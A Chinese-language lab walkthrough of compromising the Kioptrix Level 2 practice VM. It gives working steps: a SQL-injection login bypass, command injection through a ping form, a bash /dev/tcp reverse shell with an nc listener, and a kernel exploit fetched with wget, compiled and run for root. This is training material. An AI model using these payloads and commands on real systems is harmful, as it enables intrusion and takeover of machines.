目录
一、测试环境
1、系统环境
2、使用工具/软件
二、测试目的
三、操作过程
1、解决检测不到IP的问题
2、信息搜集
3、Getshell
4、提权
四、结论
一、测试环境
1、系统环境
渗透机:kali2021.1(192.168.202.134)
靶 机:Linux kioptrix.level2 2.6.9-55.EL
2、使用工具/软件
Kali: arp-scan(主机探测)、nmap(端口和服务扫描)、gobuster(目录遍历)、burpsuite(测试sql注入)、searchspoilt(查找漏洞库)、gcc(编译C源码)、python3(web服务)
测试网址:http://192.168.202.164
二、测试目的
通过web漏洞getshell,寻找内核漏洞进行提权。
三、操作过程
1、解决检测不到IP的问题
该靶机直接打开会检测不到IP
解决办法:
1.关闭虚拟机,并移除
2.将.vmx文件中以 ethernet0 开头的条目删除并保存修改
3.将VirtualHW.version改为VMware的版本保存
4.重新添加网络适配器,原来的桥接删除
2、信息搜集
主机探测
arp-scan -l
靶机IP:192.168.202.165
端口和服务扫描
nmap -sS -A -T4 -p- 192.168.202.165
开启了ssh服务(22端口)、web服务(80端口和443端口)、打印机服务(cups 631端口)
目录扫描
gobuster dir -u http://192.168.202.165 -w /usr/share/seclists/Discovery/Web-Content/direc2.3-medium.txt -x php,jsp,html,txt
主页是个后台登录框
manual页面是apache2.0手册
3、Getshell
从登录框入手,跑一下sql注入payload
跑出很多payload,存在万能密码漏洞
复制一个payload,修改到原来的包,放包
payload:
a'or' 1=1--
成功进入到后台页面
是个典型的rce漏洞案例
在ping命令后面通过连接符拼接执行命令
返回新的页面,可以执行命令
baidu.com | ls
拼接getshell的命令
执行不了nc命令,直接用bash命令反弹shell,kali端开启监听
nc -lvvp 666
bash -i >& /dev/tcp/192.168.202.134/666 0>&1
baidu.com | bash -i >& /dev/tcp/192.168.202.134/666 0>&1
成功获取到反弹shell
4、提权
寻找有用的文件
find / -perm -4000 -ls 2>/dev/null
find / -writable 2>/dev/null
sudo -l
uname -a
查找内核漏洞信息
searchsploit linux kernel 2.6.9 | grep 'Privilege Escalation'
使用的是9542.c脚本,这是本地提权脚本,需要上传到靶机编译执行
上传到靶机
searchsploit -p linux_x86/local/9542.c
cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c 9542.c
python3 -m http.server 111
靶机下载,需要在tmp目录下,拥有较高权限
cd /tmp
wget http://192.168.202.134:111/9542.c
编译并执行,成功获取root权限
gcc 9542.c -o ccc
./ccc
id
四、结论
比较简单的靶机,简单的sql注入和rce漏洞,Linux版本漏洞也很多。